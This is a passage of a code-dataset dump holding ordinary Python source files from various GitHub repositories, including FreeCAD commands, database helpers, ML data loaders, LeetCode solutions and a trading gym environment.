lattice2RecomputeLocker.touch(so.Object)\")\n else:\n #all selected objects are already touched. \n FreeCADGui.doCommand(\"for so in Gui.Selection.getSelectionEx(): so.Object.purgeTouched()\")\n \n except Exception as err:\n msgError(err)\n \n def IsActive(self):\n return App.ActiveDocument is not None\n \nif FreeCAD.GuiUp:\n FreeCADGui.addCommand('Lattice2_RecomputeLocker_Touch', _CommandTouch())\n\nexportedCommands = [\n \"Lattice2_RecomputeLocker_MakeFeature\",\n \"Lattice2_RecomputeLocker_LockRecomputes\",\n \"Lattice2_RecomputeLocker_UnlockRecomputes\",\n \"Lattice2_RecomputeLocker_RecomputeFeature\",\n \"Lattice2_RecomputeLocker_RecomputeDocument\",\n \"Lattice2_RecomputeLocker_ForceRecompute\",\n \"Lattice2_RecomputeLocker_Touch\"\n ]\ntry:\n if float(App.Version()[1]) >= 17.0:\n exportedCommands.remove(\"Lattice2_RecomputeLocker_MakeFeature\")\nexcept Exception as err:\n App.Console.PrintWarning(\"Failed to parse version string: {v}\".format(v= App.Version()[1]))\n #assume modern\n exportedCommands.remove(\"Lattice2_RecomputeLocker_MakeFeature\")\n\n \nclass CommandRecomputeGroup:\n def GetCommands(self):\n global exportedCommands\n return tuple(exportedCommands)\n\n def GetDefaultCommand(self): # return the index of the tuple of the default command. 
\n        return 0\n\n    def GetResources(self):\n        return { 'MenuText': 'Lattice recompute control:', \n                 'ToolTip': 'Document recompute controlling tools from Lattice2 workbench',\n                 'CmdType':\"ForEdit\"}\n        \n    def IsActive(self): # optional\n        return App.ActiveDocument is not None\nif FreeCAD.GuiUp:\n    FreeCADGui.addCommand('Lattice2_RecomputeLockerGroup', CommandRecomputeGroup())\n    \n    \ndef msgbox(strmsg):\n    mb = QtGui.QMessageBox()\n    mb.setIcon(mb.Icon.Warning)\n    mb.setText(strmsg)\n    mb.setWindowTitle(\"debug\")\n    mb.exec_()\n","repo_name":"DeepSOIC/Lattice2","sub_path":"lattice2RecomputeLocker.py","file_name":"lattice2RecomputeLocker.py","file_ext":"py","file_size_in_byte":18105,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"39"} +{"seq_id":"16038854214","text":"sandwich_orders = ['grilled cheese', 'pastrami', 'grilled chicken', 'pastrami', 'club', 'reuben', 'pastrami']\nfinished_sandwiches = []\nprint(\"Unfortunately the deli has run out of pastrami\")\nwhile 'pastrami' in sandwich_orders:\n    sandwich_orders.remove('pastrami')\n\nwhile sandwich_orders:\n    sandwich_made = sandwich_orders.pop()\n    print(\"I made your \" + sandwich_made.title() + \" sandwich\")\n    finished_sandwiches.append(sandwich_made)\n\nprint(\"Sandwiches made to order:\")\nfor sandwich in finished_sandwiches:\n    print(sandwich.title())\n","repo_name":"mentalclear/PythonCrashCourse","sub_path":"project/chapter7/exercises/exercise7_9.py","file_name":"exercise7_9.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"3318637697","text":"from mysql_connection import database_connection\nfrom mysql.connector import Error  # assumed import: Error is used in the except clauses below but was never imported\nfrom datetime import datetime\n \ndef create_table():\n    try:\n        connection = database_connection()\n        if connection.is_connected():\n            print('DATABASE CONNECTED')\n            query = '''\n            create table python(\n            id int auto_increment,\n            first_name varchar(10),\n            last_name varchar(10),\n            date_time datetime,\n            primary key(id)\n            )'''\n            cursor = connection.cursor()\n            cursor.execute(query)\n            print(\"Table Successfully Created\")\n    except Error as err:\n        print(\"An error has occurred:\", err)\n    finally:\n        if connection.is_connected():\n            cursor.close()\n            connection.close()\n            print(\"Database Connection Closed.\")\n\ndef insert_many_records(table_name, records):\n    try:\n        connection = database_connection()\n        if connection.is_connected():\n            query = '''\n            insert into {0}(first_name, last_name, date_time)\n            values (%s, %s, %s)\n            '''.format(table_name)\n            cursor = connection.cursor()\n            cursor.executemany(query, records)\n            connection.commit()\n            print(f\"Total {cursor.rowcount} records inserted.\")\n    except Error as err:\n        print(\"An error has occurred:\", err)\n    finally:\n        if connection.is_connected():\n            cursor.close()\n            connection.close()\n            print(\"Database Connection Closed.\")\n    \n\n\n# DRIVER CODE\nif __name__ == '__main__':\n    #create_database()\n\n    records = [\n        ('abc', 'bcc', datetime.now()),\n        ('mnm', 'nnn', datetime.now()),\n        ('lkio', 'pop', datetime.now())\n    ]\n    insert_many_records('python', records)\n","repo_name":"Susantade/Newrepo","sub_path":"mysql_db1.py","file_name":"mysql_db1.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9124096168","text":"from picamera.array import PiRGBArray\nfrom picamera import PiCamera\nfrom time import sleep\nimport sys\nimport cv2 as cv\nimport argparse\nimport numpy as np\nimport RPi.GPIO 
as GPIO\n\n#from https://stackoverflow.com/questions/35180764/opencv-python-image-too-big-to-display\ndef ResizeWithAspectRatio(image, width=None, height=None, inter=cv.INTER_AREA):\n dim = None\n (h, w) = image.shape[:2]\n\n if width is None and height is None:\n return image\n if width is None:\n r = height / float(h)\n dim = (int(w * r), height)\n else:\n r = width / float(w)\n dim = (width, int(h * r))\n\n return cv.resize(image, dim, interpolation=inter)\n\na = 0\nvid = cv.VideoCapture('4mm_hole_test2.MP4')\n# fourcc = cv.VideoWriter_fourcc(*'MPEG')\n# out = cv.VideoWriter('output.avi',fourcc, 20.0, (640,480))\nwhile (vid.isOpened()):\n ret, frame = vid.read()\n\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n\n rows = gray.shape[0]\n circles = cv.HoughCircles(gray, cv.HOUGH_GRADIENT, 1, rows / 8,\n param1=200, param2=30,\n minRadius=1, maxRadius=30)\n\n if circles is not None:\n circles = np.uint16(np.around(circles))\n if len(circles[0, :]) == 1:\n a = a + 1\n for i in circles[0, :]: \n center = (i[0], i[1])\n cv.circle(frame, center, i[2], (255, 0, 255), 3)\n resize = ResizeWithAspectRatio(frame, height=540)\n filename = 'test2-out' + str(a) + '.jpg'\n cv.imwrite(filename, resize)\n# out.write(frame)\n if a == 20:\n quit() \n \n\n","repo_name":"dmackey199/IPPD_ImgProc","sub_path":"test-with-real-vid/circle-vid.py","file_name":"circle-vid.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"32187090930","text":"from crm import models\nfrom django import forms\n\n\nclass BjModelForm(forms.ModelForm):\n class Meta:\n model = models.ClassList\n fields = '__all__'\n widgets = {\n 'course': forms.Select(attrs={'class': 'col-sm-10 form-control'}),\n 'num': forms.TextInput(attrs={'class': 'col-sm-10 form-control', 'placeholder': '第几期'}),\n 'teacher': forms.SelectMultiple(attrs={'class': 'col-sm-10 form-control'}),\n }\n error_messages = {\n 'num': {\n 'required': '此列不能为空',\n }\n }","repo_name":"cnmhl/crm","sub_path":"crm/forms/bj.py","file_name":"bj.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"42264325891","text":"# -*- coding: utf-8 -*-\n'''\nEx3_3. 
Random data storage: practice the os and random modules and basic file read/write.\n    Define a function fs(dirname, s), where dirname is a folder path and s is a string holding the data to be saved.\n    fs randomly stores s into one of the text files (\"*.txt\") under dirname.\n    For example, if dirname already contains \"a.txt\", \"b.txt\", \"c.txt\" or more text files,\n    s may be saved into \"a.txt\", \"b.txt\", \"c.txt\" or any other of them with equal probability, and existing files must not be overwritten.\n    If there is no text file under dirname, create a new file \"new.txt\" to store s.\n'''\nimport os\nimport random\n\n\ndef fs(dirname, s):\n    ans = list()\n    for file in os.listdir(dirname):\n        ex = os.path.splitext(file)[1]\n        if ex == '.txt':\n            ans.append(file)\n    if len(ans) == 0:\n        # create new.txt under dirname (the directory prefix was missing here)\n        f = open(os.path.join(dirname, 'new.txt'), 'a', encoding='utf-8')\n        f.write(s)\n        f.close()\n    else:\n        i = int(random.random() * len(ans))\n        f = open(os.path.join(dirname, ans[i]), 'a', encoding='utf-8')\n        f.write(s)\n        f.close()\n\n\nls = input('Please input the path:')\ns = input('Please input the string:')\nfs(ls, s)\n","repo_name":"shuzhiwen/study-work","sub_path":"language-python/3.综合实验/Ex3_3.py","file_name":"Ex3_3.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9039818536","text":"from typing import Optional\n\nclass ListNode:\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\n\n# version 1 - create a head\ndef removeElements(head: Optional[ListNode], val: int) -> Optional[ListNode]:\n    if head == None:\n        return head\n    p = ListNode(-1, head)\n    result = p\n    while p.next:\n        if p.next.val == val:\n            p.next = p.next.next\n        else:\n            p = p.next\n    return result.next\n\n# version 2 - remove head if equal to val\ndef removeElements(self, head: Optional[ListNode], val: int) -> Optional[ListNode]:\n    if head == None:\n        return head\n    while head and head.val == val:\n        head = head.next\n    current = head\n    while current:\n        if current.next and current.next.val == val:\n            current.next = current.next.next\n        else:\n            current = current.next\n    return head\n\n# version 3\ndef removeElements(head: Optional[ListNode], val: int) -> Optional[ListNode]:\n    if head == None:\n        return head\n    while head and head.val == val:\n        head = head.next\n    current = head\n    while current:\n        # current.next exists when current exists\n        while current.next and current.next.val == val:\n            current.next = current.next.next\n        current = current.next\n    return head","repo_name":"wxy991015/LeetCode","sub_path":"Easy/Remove Linked List Elements.py","file_name":"Remove Linked List Elements.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"40820578834","text":"import submarine\nfrom os import environ\nfrom submarine.store.database.models import SqlMetric, SqlParam\nfrom submarine.tracking import utils\n\nJOB_NAME = \"application_123456789\"\n\n\ndef test_log_param(tracking_uri_mock):\n    environ[\"SUBMARINE_JOB_NAME\"] = JOB_NAME\n    submarine.log_param(\"name_1\", \"a\", \"worker-1\")\n\n    tracking_uri = utils.get_tracking_uri()\n    store = utils.get_sqlalchemy_store(tracking_uri)\n\n    # Validate params\n    with store.ManagedSessionMaker() as session:\n        params = session \\\n            .query(SqlParam) \\\n            .options() \\\n            .filter(SqlParam.job_name == JOB_NAME).all()\n        assert params[0].key == \"name_1\"\n        assert params[0].value == \"a\"\n        assert params[0].worker_index == \"worker-1\"\n        assert params[0].job_name == JOB_NAME\n\n\ndef test_log_metric(tracking_uri_mock):\n    environ[\"SUBMARINE_JOB_NAME\"] = JOB_NAME\n    submarine.log_metric(\"name_1\", 5, \"worker-1\")\n    submarine.log_metric(\"name_1\", 6, \"worker-2\")\n\n    tracking_uri = utils.get_tracking_uri()\n    store = 
utils.get_sqlalchemy_store(tracking_uri)\n\n # Validate params\n with store.ManagedSessionMaker() as session:\n metrics = session \\\n .query(SqlMetric) \\\n .options() \\\n .filter(SqlMetric.job_name == JOB_NAME).all()\n assert len(metrics) == 2\n assert metrics[0].key == \"name_1\"\n assert metrics[0].value == 5\n assert metrics[0].worker_index == \"worker-1\"\n assert metrics[0].job_name == JOB_NAME\n assert metrics[1].value == 6\n assert metrics[1].worker_index == \"worker-2\"\n","repo_name":"pingsutw/Submarine-SDK","sub_path":"tests/tracking/test_tracking.py","file_name":"test_tracking.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"13435515188","text":"import glob\nimport os\nimport os.path as osp\nimport sys\n\nimport torch\nfrom setuptools import find_packages, setup\nfrom torch.__config__ import parallel_info\nfrom torch.utils.cpp_extension import (CUDA_HOME, BuildExtension, CppExtension,\n CUDAExtension)\n\nWITH_CUDA = torch.cuda.is_available() and CUDA_HOME is not None\nif os.getenv('FORCE_CUDA', '0') == '1':\n WITH_CUDA = True\nif os.getenv('FORCE_ONLY_CPU', '0') == '1':\n WITH_CUDA = False\n\n\ndef get_extensions():\n Extension = CppExtension\n define_macros = []\n libraries = []\n extra_compile_args = {'cxx': []}\n extra_link_args = []\n\n info = parallel_info()\n if 'parallel backend: OpenMP' in info and 'OpenMP not found' not in info:\n extra_compile_args['cxx'] += ['-DAT_PARALLEL_OPENMP']\n if sys.platform == 'win32':\n extra_compile_args['cxx'] += ['/openmp']\n else:\n extra_compile_args['cxx'] += ['-fopenmp']\n else:\n print('Compiling without OpenMP...')\n\n if WITH_CUDA:\n Extension = CUDAExtension\n define_macros += [('WITH_CUDA', None)]\n nvcc_flags = os.getenv('NVCC_FLAGS', '')\n nvcc_flags = [] if nvcc_flags == '' else nvcc_flags.split(' ')\n nvcc_flags += ['-arch=sm_35', '--expt-relaxed-constexpr']\n extra_compile_args['nvcc'] = nvcc_flags\n\n extensions_dir = osp.join('csrc')\n main_files = glob.glob(osp.join(extensions_dir, '*.cpp'))\n extensions = []\n for main in main_files:\n name = main.split(os.sep)[-1][:-4]\n\n sources = [main]\n\n path = osp.join(extensions_dir, 'cpu', f'{name}_cpu.cpp')\n if osp.exists(path):\n sources += [path]\n\n path = osp.join(extensions_dir, 'cuda', f'{name}_cuda.cu')\n if WITH_CUDA and osp.exists(path):\n sources += [path]\n\n extension = Extension(\n 'torch_geometric_autoscale._' + name,\n sources,\n include_dirs=[extensions_dir],\n define_macros=define_macros,\n extra_compile_args=extra_compile_args,\n extra_link_args=extra_link_args,\n libraries=libraries,\n )\n extensions += [extension]\n\n return extensions\n\n\ninstall_requires = ['ogb', 'hydra-core']\nsetup_requires = ['pytest-runner']\ntests_require = ['pytest', 'pytest-cov']\n\nsetup(\n name='torch_geometric_autoscale',\n version='0.0.0',\n author='Matthias Fey',\n author_email='matthias.fey@tu-dortmund.de',\n description='PyGAS: Auto-Scaling GNNs in PyTorch Geometric',\n python_requires='>=3.6',\n install_requires=install_requires,\n setup_requires=setup_requires,\n tests_require=tests_require,\n extras_require={'test': tests_require},\n ext_modules=get_extensions(),\n cmdclass={\n 'build_ext':\n BuildExtension.with_options(no_python_abi_suffix=True, use_ninja=False)\n },\n 
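# automatically discover every package directory to install\n    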
packages=find_packages(),\n)\n","repo_name":"rusty1s/pyg_autoscale","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":153,"dataset":"github-code","pt":"39"} +{"seq_id":"25317229109","text":"# -*- coding: utf-8 -*-\n\"\"\"Library Without Borders box in Detroit, USA\"\"\"\nfrom .idb import * # noqa\nfrom django.utils.translation import ugettext_lazy as _\n\nIDEASCUBE_NAME = u\"Library Whitout Border Detroit\"\nIDEASCUBE_PLACE_NAME = _(\"city\")\nCOUNTRIES_FIRST = ['US']\nTIME_ZONE = None\nLANGUAGE_CODE = 'en'\nLOAN_DURATION = 14\nMONITORING_ENTRY_EXPORT_FIELDS = ['serial', 'user_id', 'birth_year', 'gender']\nUSER_FORM_FIELDS = (\n ('Ideasbox', ['serial', 'box_awareness']),\n (_('Personal informations'), ['short_name', 'full_name', 'birth_year', 'gender', 'id_card_number']), # noqa\n (_('Family'), ['marital_status', 'family_status', 'children_under_12', 'children_under_18', 'children_above_18']), # noqa\n (_('In the town'), ['current_occupation', 'school_level']),\n (_('Language skills'), ['en_level']),\n)\n\nHOME_CARDS = STAFF_HOME_CARDS + [\n {\n 'id': 'blog',\n },\n {\n 'id': 'library',\n },\n {\n 'id': 'mediacenter',\n },\n {\n 'id': 'wikipedia.old',\n },\n {\n 'id': 'khanacademy',\n },\n {\n 'id': 'gutenberg.old',\n },\n]\n","repo_name":"blqn/ideascube","sub_path":"ideascube/conf/idb_lwb_detroit_usa.py","file_name":"idb_lwb_detroit_usa.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"39"} +{"seq_id":"17106552965","text":"import distribute_setup\ndistribute_setup.use_setuptools()\n\nimport os\nfrom setuptools import setup, find_packages\n\ndef find_files(dirname):\n files = []\n for entryname in os.listdir(dirname):\n pathname = \"%s/%s\" % (dirname, entryname)\n if os.path.isfile(pathname):\n files.append(pathname)\n elif os.path.isdir(pathname):\n files += find_files(pathname) \n return files\n \nsetup(\n name='Memopol',\n version = '1.99.1',\n author = 'The memopol project',\n author_email = 'deubeulyou@gmail.com',\n description = 'Memoire Politique',\n long_description = open('README.txt').read(),\n license = 'LICENSE.txt',\n url = 'http://projets.lqdn.fr/projects/mempol',\n packages = find_packages(),\n include_package_data = True,\n scripts = find_files('bin'),\n install_requires = open('requirements.txt').read(),\n extras_require = {\n 'test': open('requirements-test.txt').read()\n }\n)\n","repo_name":"mparisot-wescale/memopol2","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"4635742558","text":"import torch\nimport torchmetrics.functional.classification as metrics\nfrom torch import Tensor\nfrom typing import Literal\n\n\nclass Evaluator:\n \"\"\"Evaluate experiment results with given metrics\"\"\"\n def __init__(self, use_metrics: list[Literal['AUC', 'AP']], num_classes: int):\n super(Evaluator, self).__init__()\n self.metric_results: dict[str, list] = {metric: [] for metric in use_metrics}\n self.__num_classes = num_classes\n\n def evaluate_test(self, predicts: Tensor, target: Tensor, test_mask: Tensor):\n \"\"\"Evaluate on the test set\"\"\"\n for metric, results in self.metric_results.items():\n result = self._evaluate(metric, predicts, target, test_mask)\n results.append(result.item())\n yield f\"{metric}: {result:.6f}, \"\n\n def 
get_final_results(self):\n \"\"\"Return final results by 'mean ± std'\"\"\"\n for metric, results in self.metric_results.items():\n final = torch.tensor(results)\n yield f\"Final {metric}: {final.mean().item():.4f} ± {final.std(dim=0).item():.4f}, \"\n\n def _evaluate(self,\n metric_name: str,\n predicts: Tensor,\n target: Tensor,\n mask: Tensor):\n if metric_name == 'AUC':\n return metrics.multiclass_auroc(predicts[mask], target[mask],\n num_classes=self.__num_classes)\n elif metric_name == 'AP':\n return metrics.multiclass_average_precision(\n predicts[mask], target[mask],\n num_classes=self.__num_classes)\n else:\n raise ValueError('Invalid metric name')\n\n def __str__(self):\n return f\"Results: {self.metric_results}\"\n","repo_name":"HotranLandoler/baselines-lab","sub_path":"evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"74035875314","text":"import math\nimport torch\nimport time\nimport numpy as np\n\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nfrom local_logger import Logger\nfrom torch.nn import Parameter\nfrom torchvision import datasets, transforms\n\n# Load cifar 10\ndef get_cifar10(batch_size):\n trsnform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))])\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data', train=True, download=True,\n transform=trsnform), batch_size=batch_size, shuffle=True, num_workers=0)\n test_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data', train=False, download=True,\n transform=trsnform), batch_size=batch_size, shuffle=True, num_workers=0)\n\n return train_loader, test_loader\n\n# Load MNIST\ndef get_mnist(batch_size):\n trsnform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))])\n train_loader = torch.utils.data.DataLoader(\n datasets.MNIST('./data', train=True, download=True,\n transform=trsnform), batch_size=batch_size, shuffle=True, num_workers=0)\n test_loader = torch.utils.data.DataLoader(\n datasets.MNIST('./data', train=False, download=True,\n transform=trsnform), batch_size=batch_size, shuffle=True, num_workers=0)\n\n return train_loader, test_loader\n\n# Randonly Labeling Cifar10\nclass CIFAR10RandomLabels(datasets.CIFAR10):\n def __init__(self, corrupt_prob=0.0, num_classes=10, **kwargs):\n super(CIFAR10RandomLabels, self).__init__(**kwargs)\n self.n_classes = num_classes\n if corrupt_prob > 0:\n self.corrupt_labels(corrupt_prob)\n \n def corrupt_labels(self, corrupt_prob):\n labels = np.array(self.train_labels if self.train else self.test_labels)\n np.random.seed(12345)\n mask = np.random.rand(len(labels)) <= corrupt_prob\n rnd_labels = np.random.choice(self.n_classes, mask.sum())\n labels[mask] = rnd_labels\n labels = [int(x) for x in labels]\n \n if self.train:\n self.train_labels = labels\n else:\n self.test_labels = labels","repo_name":"dsxxxk/CS5339","sub_path":"Project/Code/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"34767761328","text":"from flask import Flask, request, render_template\n\napp = Flask(__name__)\n\n\n@app.route('/uploads', methods=['GET', 'POST'])\ndef uploads():\n if request.method == 'GET':\n return render_template('index.html')\n if request.method == 'POST':\n return 
'success, url'\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"fengzhiziLy/PythonFlask","sub_path":"01class_view/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39827285485","text":"from typing import List, Tuple, Union\n\nimport pandas as pd\n\nfrom experimenter.data import DataProvider\nfrom experimenter.utils import text\nfrom experimenter.utils import utils as U\n\n\nclass LMProvider(DataProvider):\n    \"\"\"Data Provider for Language Modeling Task\"\"\"\n\n    def __init__(self, config):\n        super(LMProvider, self).__init__(config)\n        # Setup encoding pipeline\n        cleaner = text.clean_text()\n        char_tokenizer = text.Tokenizer(sep=\"\")\n\n        enc = text.Encoder(update_vocab=True, no_special_chars=False)\n        # label_enc = text.Encoder(update_vocab=True, no_special_chars=True)\n        as_is = U.chainer(funcs=[lambda x: x])\n\n        self.encoder = {}\n        self.encoder[\"inp\"] = [U.chainer(funcs=[cleaner, char_tokenizer, enc])]\n        self.encoder[\"label\"] = self.encoder[\"inp\"]\n        self.encoder[\"pred\"] = self.encoder[\"inp\"]\n        self.encoder[\"mask\"] = [as_is]\n        self.encoder[\"out\"] = self.encoder[\"mask\"]\n        self.encoder[\"meta\"] = as_is\n\n        self.decoder = {}\n        self.decoder[\"inp\"] = [U.chainer(funcs=[enc.decode, char_tokenizer.detokenize])]\n        self.decoder[\"label\"] = self.decoder[\"inp\"]\n        self.decoder[\"pred\"] = self.decoder[\"inp\"]\n        self.decoder[\"mask\"] = [as_is]\n        self.decoder[\"out\"] = [as_is]\n        self.decoder[\"meta\"] = as_is\n\n        # Process data\n        raw_data = self.upload_data()\n        raw_data = self._create_splits(raw_data)\n        s = [self.__call__(d, list_input=True) for d in raw_data]\n        enc.freeze()\n        config[\"processor\"][\"params\"][\"vocab_size\"] = len(\n            enc.vocab\n        )  # Needs changing, we might have multiple vocabs\n        config[\"processor\"][\"params\"][\"padding_indx\"] = enc.get_padding_indx()\n\n        self.data_raw = raw_data\n        self.data = tuple([self._to_batches(split) for split in s])\n        self.sample_data_raw = self.data_raw[0][1]\n        self.sample_data_processed = s[0][1]\n\n    def upload_data(\n        self, **kwargs\n    ) -> List[\n        Tuple[List[Union[List[int], int]], List[Union[List[int], int]], List[int]]\n    ]:\n        \"\"\"Read data file and return list of sentences with S and E symbols\n\n        currently, reads csv that contains two columns s1, s2 and stance with sentences in each\n        \"\"\"\n        data_in = pd.read_csv(self.input_path[0])\n        data_in[\"stance\"] = data_in[\"stance\"].astype(str)\n\n        def f(x):\n            return \"S\" + x + \"E\"\n\n        s1_data = [f(x) for x in data_in[\"s1\"]]\n        s2_data = [f(x) for x in data_in[\"s2\"]]\n\n        data = [\n            {\"inp\": [d[:-2]], \"label\": [d[1:]], \"mask\": [1]}\n            for d, d2 in zip(s1_data, s2_data)\n        ]\n\n        return data\n","repo_name":"jkhouja/experimenter","sub_path":"experimenter/LM/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"71759118195","text":"# Given an array nums of n integers and a target value target, find and return all the unique quadruplets [nums[a], nums[b], nums[c], nums[d]] that satisfy all of the conditions below (two quadruplets are considered duplicates if their elements correspond one to one):\n#\n# 0 <= a, b, c, d < n\n# a, b, c and d are pairwise distinct\n# nums[a] + nums[b] + nums[c] + nums[d] == target\n# You may return the answer in any order.\n#\n#\n# Example 1:\n#\n# Input: nums = [1,0,-1,0,-2,2], target = 0\n# Output: [[-2,-1,1,2],[-2,0,0,2],[-1,0,0,1]]\n# Example 2:\n#\n# Input: nums = [2,2,2,2,2], target = 8\n# Output: [[2,2,2,2]]\n#\n#\n# Constraints:\n#\n# 1 <= nums.length <= 200\n# -10^9 <= nums[i] <= 
10^9\n# -10^9 <= target <= 10^9\n\nfrom collections import Counter, defaultdict\nfrom math import inf\nfrom typing import List\nclass Solution:\n    def fourSum(self, nums: List[int], target: int) -> List[List[int]]:\n        nums.sort()\n        n = len(nums)\n        ans = []\n        for i in range(n):\n            if i > 0 and nums[i] == nums[i - 1]: continue\n            for j in range(i + 1, n):\n                if j > i + 1 and nums[j] == nums[j - 1]: continue\n                rid = n - 1\n                for k in range(j + 1, n):\n                    if k >= rid: break\n                    if k > j + 1 and nums[k] == nums[k - 1]: continue\n                    s = nums[i] + nums[j] + nums[k]\n                    left = target - s\n                    while rid > k and left <= nums[rid]:\n                        if left == nums[rid]:\n                            ans.append([nums[i], nums[j], nums[k], nums[rid]])\n                            break\n                        rid -= 1\n\n        return ans\n\n\n\nso = Solution()\nprint(so.fourSum(nums = [-3,-2,-1,0,0,1,2,3], target = 0))\nprint(so.fourSum(nums = [1,0,-1,0,-2,2], target = 0))\nprint(so.fourSum(nums = [2,2,2,2,2], target = 8))\n","repo_name":"wangsun39/leetcode","sub_path":"all-code/0-100/019fourSum.py","file_name":"019fourSum.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"73603351154","text":"#!/usr/bin/env python\n\nfrom PIL import Image\nfrom cached_property import cached_property\nfrom exchange_data.data.orderbook_frame import OrderBookFrame\nfrom gym.spaces import Discrete\nfrom matplotlib import pyplot as plt\nfrom tgym.envs.orderbook import OrderBookTradingEnv\n\nimport click\nimport matplotlib\nimport numpy as np\nimport random\nimport cv2\nimport alog\n\n\n\n\nclass OrderBookFrameEnv(OrderBookFrame, OrderBookTradingEnv):\n    random_frame_start: bool = False\n\n    def __init__(\n        self,\n        show_img=False,\n        frame_width=224,\n        macd_diff_enabled=False,\n        random_frame_start=False,\n        trial=None,\n        num_env=1,\n        **kwargs\n    ):\n        super().__init__(action_space=Discrete(2), **kwargs)\n        OrderBookTradingEnv.__init__(\n            self, frame_width=frame_width, action_space=Discrete(2), **kwargs\n        )\n        self.plot_count = 0\n\n        if random_frame_start:\n            self.random_frame_start = random_frame_start\n        self._show_img = show_img\n\n        if not self._show_img:\n            matplotlib.use(\"agg\")\n\n        self.trial = trial\n        self.num_env = num_env\n        kwargs[\"batch_size\"] = 1\n        self.macd_diff_enabled = macd_diff_enabled\n        self.observations = None\n        self.prune_capital = 1.01\n        self.total_steps = 0\n        self.was_reset = False\n        self.macd_diff = None\n\n    @property\n    def done(self):\n        return self._done\n\n    @done.setter\n    def done(self, value):\n        self._done = value\n\n    @property\n    def best_bid(self):\n        return self._best_bid\n\n    @property\n    def best_ask(self):\n        return self._best_ask\n\n    @cached_property\n    def frame(self):\n        return super().frame\n\n    @property\n    def frame_start(self):\n        if self.random_frame_start:\n            return random.randint(0, len(self.frame))\n        else:\n            return 0\n\n    def _get_observation(self):\n        self.max_steps = len(self.frame)\n\n        for i in range(self.frame_start, len(self.frame)):\n            row = self.frame.iloc[i]\n            best_ask = row.best_ask\n            best_bid = row.best_bid\n            frame = row.orderbook_img\n            # macd_diff = row.macd_diff\n            timestamp = row.name.to_pydatetime()\n\n            yield timestamp, best_ask, best_bid, frame\n\n    def get_observation(self):\n        if self.observations is None:\n            self.observations = self._get_observation()\n\n        try:\n            timestamp, best_ask, best_bid, frame = next(self.observations)\n        except StopIteration:\n            self.observations = None\n            self.done = True\n            return self.last_observation\n\n        self._best_ask = best_ask\n        self._best_bid = best_bid\n\n        
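# record the current position's name (first letter) in the per-step history\n        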
self.position_history.append(self.position.name[0])\n\n self.last_datetime = str(timestamp)\n\n self._last_datetime = timestamp\n\n if self.current_trade:\n self.position_pnl_history.append(self.current_trade.pnl)\n\n ob_img = self.plot_orderbook(frame)\n\n if self._show_img:\n self.show_img(ob_img)\n\n ob_img = ob_img[:, :, :3]\n ob_img = np.expand_dims(ob_img, axis=0)\n\n self.last_observation = ob_img\n\n return self.last_observation\n\n def plot_orderbook(self, data):\n fig, frame = plt.subplots(1, 1, figsize=(1, 1), dpi=self.frame_width)\n # frame.axis('off')\n frame = frame.twinx()\n plt.autoscale(tight=True)\n frame.axis(\"off\")\n plt.subplots_adjust(top=1, bottom=0, right=1, left=0, hspace=0, wspace=0)\n plt.margins(0, 0)\n\n fig.patch.set_visible(False)\n frame.imshow(data)\n fig.canvas.draw()\n img = fig.canvas.renderer._renderer\n\n plt.close()\n\n return np.array(img)\n\n def plot_pnl(self):\n pnl = np.asarray(self.position_pnl_history)\n\n if pnl.shape[0] > 0:\n fig, price_frame = plt.subplots(1, 1, figsize=(2, 1), dpi=self.frame_width)\n\n min = abs(pnl.min())\n pnl = pnl + min\n\n # pnl_frame = price_frame.twinx()\n pnl_frame = price_frame\n pnl_frame.plot(pnl, color=\"black\")\n\n plt.fill_between(range(pnl.shape[0]), pnl, color=\"black\")\n\n plt.autoscale(tight=True)\n pnl_frame.axis(\"off\")\n fig.patch.set_visible(False)\n fig.canvas.draw()\n\n _img = fig.canvas.renderer._renderer\n\n plt.close()\n\n img = 